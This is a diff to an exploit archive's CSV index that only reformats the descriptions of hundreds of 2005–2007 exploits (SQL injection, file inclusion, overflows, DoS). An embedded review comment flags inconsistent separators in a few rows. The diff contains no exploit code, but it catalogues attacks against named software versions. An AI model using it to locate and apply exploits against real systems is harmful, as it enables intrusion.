@@ -814,15 +814,15 @@ id,file,description,date,author,platform,type,port 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 -1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 -1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st)",2005-05-20,Alpha_Programmer,cgi,webapps,0 +1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0 +1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board <= 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service Exploit",2005-05-21,"Daniel Hartmeier",multiple,dos,0 1009,platforms/linux/local/1009.c,"Exim <= 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 -1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 -1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php)",2005-05-26,mh_p0rtal,asp,webapps,0 -1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html)",2005-05-26,"Soroush Dalili",asp,webapps,0 
+1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 +1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php)",2005-05-26,mh_p0rtal,asp,webapps,0 +1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html)",2005-05-26,"Soroush Dalili",asp,webapps,0 1013,platforms/php/webapps/1013.pl,"Invision Power Board <= 2.0.3 - Login.php SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0 1014,platforms/php/webapps/1014.txt,"Invision Power Board <= 2.0.3 - Login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)",2005-05-27,"Soroush Dalili",asp,webapps,0 
@@ -931,7 +931,7 @@ id,file,description,date,author,platform,type,port 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 -1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 +1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 
@@ -1122,7 +1122,7 @@ id,file,description,date,author,platform,type,port 1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 -1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 +1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart <= 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0 
@@ -1152,7 +1152,7 @@ id,file,description,date,author,platform,type,port
 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (Metasploit)",2005-12-20,redsand,windows,remote,21
-1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
+1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0
 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0
 1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 - (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0
@@ -1210,7 +1210,7 @@ id,file,description,date,author,platform,type,port
 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow Exploit (cpp)",2006-01-31,HolyGhost,windows,remote,21
 1463,platforms/windows/remote/1463.pm,"SoftiaCom WMailserver 1.0 - SMTP Remote Buffer Overflow Exploit (Metasploit)",2006-02-01,y0,windows,remote,21
 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (telnetd) Remote Denial of Service Exploit",2006-02-02,"Fabian Ramirez",hardware,dos,0
-1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated)",2006-02-12,"Andres Tarasco",windows,local,0
+1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Local Privilege Escalation Exploit (2)",2006-02-12,"Andres Tarasco",windows,local,0
 1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow Exploit",2006-02-03,"securma massine",windows,remote,25
 1467,platforms/php/webapps/1467.php,"LoudBlog <= 0.4 - (path) Arbitrary Remote Inclusion Exploit",2006-02-03,rgod,php,webapps,0
 1468,platforms/php/webapps/1468.php,"Clever Copy <= 3.0 Admin Auth Details / Remote SQL Injection Exploit",2006-02-04,rgod,php,webapps,0
@@ -1934,7 +1934,7 @@ id,file,description,date,author,platform,type,port
 2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow PoC",2006-08-21,"Jacobo Avariento",multiple,dos,0
 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0
 2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 - (checklevel.php) Remote File Include",2006-08-22,"Bob Linuson",php,webapps,0
-2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated)",2006-08-22,"the master",php,webapps,0
+2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2)",2006-08-22,"the master",php,webapps,0
 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
@@ -2215,7 +2215,7 @@ id,file,description,date,author,platform,type,port
 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include",2006-10-11,Zickox,php,webapps,0
 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0
 2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 - (spaw) Remote File Include",2006-10-12,v1per-haCker,php,webapps,0
-2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
+2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0
 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0
 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0
@@ -2385,7 +2385,7 @@ id,file,description,date,author,platform,type,port
 2692,platforms/php/webapps/2692.txt,"GEPI <= 1.4.0 gestion/savebackup.php Remote File Include",2006-10-31,"Sumit Siddharth",php,webapps,0
 2693,platforms/php/webapps/2693.txt,"PwsPHP <= 1.1 - (themes/fin.php) Remote File Include Vulnerablity",2006-10-31,3l3ctric-Cracker,php,webapps,0
 2694,platforms/php/webapps/2694.php,"T.G.S. CMS <= 0.1.7 - (logout.php) Remote SQL Injection Exploit",2006-10-31,Kacper,php,webapps,0
-2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0
+2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0
 2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0
 2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 - (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0
 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0
@@ -3017,7 +3017,7 @@ id,file,description,date,author,platform,type,port
 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU consumption) Remote DoS Exploit",2007-02-20,Marsu,windows,dos,0
 3348,platforms/php/webapps/3348.txt,"SendStudio <= 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0
 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - (.NBI) Local Buffer Overflow Exploit",2007-02-21,Marsu,windows,local,0
-3350,platforms/windows/dos/3350.html,"BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0
+3350,platforms/windows/dos/3350.html,"BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit",2007-02-21,shinnai,windows,dos,0
 3351,platforms/php/webapps/3351.pl,"webSPELL <= 4.01.02 - (topic) Remote SQL Injection Exploit",2007-02-21,DNX,php,webapps,0
 3352,platforms/php/webapps/3352.php,"Connectix Boards <= 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0
 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) RFI Vulnerabilities",2007-02-21,Denven,php,webapps,0
@@ -3073,14 +3073,14 @@ id,file,description,date,author,platform,type,port
 3404,platforms/multiple/dos/3404.php,"PHP wddx_deserialize() String Append Crash Exploit",2007-03-04,"Stefan Esser",multiple,dos,0
 3405,platforms/multiple/remote/3405.txt,"PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS",2007-03-04,"Stefan Esser",multiple,remote,0
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Include Exploit",2007-03-04,bd0rk,php,webapps,0
-3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0
+3407,platforms/multiple/dos/3407.c,"Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit",2007-03-04,fbffff,multiple,dos,0
 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - (subcat.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) Remote SQL Injection Exploit",2007-03-04,ajann,php,webapps,0
 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse <= 1.6 - Remote Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0
-3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
-3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
+3413,platforms/multiple/local/3413.php,"PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0
+3414,platforms/multiple/local/3414.php,"PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information 
Leak",2007-03-04,"Stefan Esser",multiple,local,0
 3415,platforms/linux/dos/3415.html,"Konqueror 3.5.5 - (JavaScript Read of FTP Iframe) DoS Exploit",2007-03-05,mark,linux,dos,0
 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) Remote SQL Injection Exploit",2007-03-05,ajann,php,webapps,0
 3417,platforms/windows/local/3417.php,"PHP <= 4.4.6 - mssql_[p]connect() Local Buffer Overflow Exploit",2007-03-05,rgod,windows,local,0
@@ -3162,7 +3162,7 @@ id,file,description,date,author,platform,type,port
 3496,platforms/php/webapps/3496.php,"Php-Stats <= 0.1.9.1b (PC-REMOTE-ADDR) SQL Injection Exploit",2007-03-16,rgod,php,webapps,0
 3497,platforms/php/webapps/3497.php,"Php-Stats <= 0.1.9.1b (ip) Remote SQL Injection Exploit",2007-03-16,rgod,php,webapps,0
 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - (kommentare.php) Remote SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0
-3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0
+3499,platforms/linux/local/3499.php,"PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit",2007-03-16,"Stefan Esser",linux,local,0
 3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 - (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0
 3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0
 3502,platforms/php/webapps/3502.php,"Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0
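Review bot: The rewritten 3413 and 3414 rows in the -3073 hunk keep the stray ` - ` before the version slash, so each description now carries two separators (`PHP < 4.4.5 - / 5.2.1 - php_binary ...`), whereas the 3407 row in the same hunk and the 3499, 3525, 3566, 3586 and 4392 rows in later hunks move the single separator after the version list (`PHP <= 4.4.6 / 5.2.1 - ...`). The same leftover appears in the 3571 and 3572 rows of the -3227 hunk. For consistency the two rows should read `"PHP < 4.4.5 / 5.2.1 - php_binary Session Deserialization Information Leak"` and `"PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak"`. The +3414 line is split across two physical lines in this view, with its tail at the start of the line this note follows.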
@@ -3187,7 +3187,7 @@ id,file,description,date,author,platform,type,port
 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0
 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0
 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) RFI",2007-03-20,"Cold Zero",php,webapps,0
-3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
+3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0
 3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0
 3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32)",2007-03-20,mu-b,windows,dos,0
 3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 - (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0
@@ -3227,13 +3227,13 @@ id,file,description,date,author,platform,type,port
 3563,platforms/php/webapps/3563.txt,"ttCMS <= 4 - (ez_sql.php lib_path) Remote File Inclusion",2007-03-24,Kacper,php,webapps,0
 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0
 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0
-3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0
+3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0
 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0
 3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 - (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0
 3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0
 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21
-3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
-3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0
+3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0
+3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0
 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0
 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
@@ -3246,7 +3246,7 @@ id,file,description,date,author,platform,type,port
 3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0
 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0
 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0
-3586,platforms/linux/dos/3586.php,"PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0
+3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0
 3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0
 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 - (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0
 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-27,skillTube,windows,remote,80
@@ -3263,11 +3263,11 @@ id,file,description,date,author,platform,type,port
 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant <= 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0
 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0
 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit",2007-03-29,"Winny Thomas",windows,dos,0
-3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0
+3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0
 3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
 3605,platforms/php/webapps/3605.php,"Picture-Engine <= 1.2.0 - (wall.php cat) Remote SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0
 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0
-3607,platforms/php/webapps/3607.txt,"Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0
+3607,platforms/php/webapps/3607.txt,"Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0
 3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0
 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)",2007-03-30,"Winny Thomas",linux,remote,0
 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0
@@ -3843,7 +3843,7 @@ id,file,description,date,author,platform,type,port
 4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 - (insertorder.cfm) Remote SQL Injection",2007-07-18,meoconx,php,webapps,0
 4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 - Remote File Upload",2007-07-18,"Cold Zero",php,webapps,0
 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion",2007-07-18,mozi,php,webapps,0
-4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0
+4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0
 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 - (link_main.php) RFI",2007-07-18,bd0rk,php,webapps,0
 4198,platforms/asp/webapps/4198.txt,"A-shop <= 0.70 - Remote File Deletion",2007-07-18,Timq,asp,webapps,0
 4199,platforms/php/webapps/4199.txt,"Md-Pro <= 1.0.8x (Topics topicid) Remote SQL Injection",2007-07-18,anonymous,php,webapps,0
@@ -3998,7 +3998,7 @@ id,file,description,date,author,platform,type,port
 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0
 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0
 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0
-4352,platforms/php/webapps/4352.txt,"Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0
+4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0
 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) Remote SQL Injection",2007-09-02,k1tk4t,php,webapps,0
 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - (m3u File) Local Buffer OverFlow Exploit",2007-09-02,0x58,windows,local,0
 4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - (m3u File) Local Buffer Overflow Exploit",2007-09-02,0x58,windows,local,0
@@ -4038,7 +4038,7 @@ id,file,description,date,author,platform,type,port
 4389,platforms/windows/remote/4389.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) Remote BoF Exploit",2007-09-10,shinnai,windows,remote,0
 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / LFI Vulnerabilities",2007-09-10,k1tk4t,php,webapps,0
 4391,platforms/multiple/remote/4391.c,"Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit",2007-09-10,"Mattias Bengtsson",multiple,remote,0
-4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
+4392,platforms/multiple/local/4392.txt,"PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0
 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0
 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit",2007-09-11,shinnai,windows,remote,0
 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
@@ -4098,7 +4098,7 @@ id,file,description,date,author,platform,type,port
 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote BoF Exploit (0Day)",2007-09-24,h07,windows,remote,80
